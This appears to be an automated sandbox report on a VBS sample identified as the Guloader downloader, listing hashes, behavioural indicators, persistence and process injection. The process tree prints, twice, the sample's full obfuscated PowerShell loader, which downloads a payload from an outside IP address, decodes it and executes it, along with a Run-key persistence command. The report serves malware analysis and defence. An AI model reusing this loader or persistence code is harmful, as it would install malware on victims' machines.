Analysis
-
max time kernel
148s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20230705-en -
resource tags
arch:x64arch:x86image:win7-20230705-enlocale:en-usos:windows7-x64system -
submitted
12/07/2023, 09:23
Static task
static1
Behavioral task
behavioral1
Sample
Reylon.vbs
Resource
win7-20230705-en
Behavioral task
behavioral2
Sample
Reylon.vbs
Resource
win10v2004-20230703-en
General
-
Target
Reylon.vbs
-
Size
16KB
-
MD5
5fcc423dd95776e7ce18ea1804b27118
-
SHA1
85bbd202a7a2919cb4733c564dfd7c3ae2319510
-
SHA256
82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56
-
SHA512
63c9f5e642da7de4d6aab845e3f9940bf23b13fd75be8cd55b4639a688a840b01ec2b7e7c42eba22347ab5061d1a5a0ba55bb528ac779d9e7820e324af83483f
-
SSDEEP
384:cEYCB7v5QM+PUiStGvDQzX4FG0NClMgW8Q2T:c5CDkLKbW8zT
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 3052 WScript.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run ieinstal.exe Set value (str) \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" ieinstal.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2668 ieinstal.exe 2668 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2348 powershell.exe 2668 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2348 set thread context of 2668 2348 powershell.exe 31 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 564 powershell.exe 2348 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 564 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2668 ieinstal.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3052 wrote to memory of 564 3052 WScript.exe 27 PID 3052 wrote to memory of 564 3052 WScript.exe 27 PID 3052 wrote to memory of 564 3052 WScript.exe 27 PID 564 wrote to memory of 2348 564 powershell.exe 30 PID 564 wrote to memory of 2348 564 powershell.exe 30 PID 564 wrote to memory of 2348 564 powershell.exe 30 PID 564 wrote to memory of 2348 564 powershell.exe 30 PID 2348 wrote to memory of 2668 2348 powershell.exe 31 PID 2348 wrote to memory of 2668 2348 powershell.exe 31 PID 2348 wrote to memory of 2668 2348 powershell.exe 31 PID 2348 wrote to memory of 2668 2348 powershell.exe 31 PID 2348 wrote to memory of 2668 2348 powershell.exe 31 PID 2348 wrote to memory of 2668 2348 powershell.exe 31 PID 2348 wrote to memory of 2668 2348 powershell.exe 31 PID 2348 wrote to memory of 2668 2348 powershell.exe 31
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2668
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5770d8350daae6c7f2b5b25ca43f3522a
SHA1c96b106e2d7bba04ba7c36458739a8825d42a189
SHA256a771ab56702938dc05d65cebb57c6697b5ce152330222abc36775107e131d0ab
SHA512421a70e8b4c4ef6182d542c622a5139c820d1bfe58ab8bcc3240f62263cc5c6df16a68319e144930f5320f9cb2e9242d9c60e6ba7b71f4f9ee7f84486c2db084
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0S6AHN3HR5DX9LVALPHG.temp
Filesize7KB
MD5271ae57e5fe7ec7130268737b82214b5
SHA1be8854b23b036dc02c441b7975f0d3c5291f1213
SHA256fd950c53f966e28f87c20d132f718a54534709640e4e6a5c79fb5a8ca42a83ac
SHA512a3f9777fa851e5248cba54dd54ee5456d58abe07cc644ae6df6f7d5fd1a8df150b5eaeda76d128a7b0a9f0801156ac203bfe2808b3aa2d99f0128abea2a7a699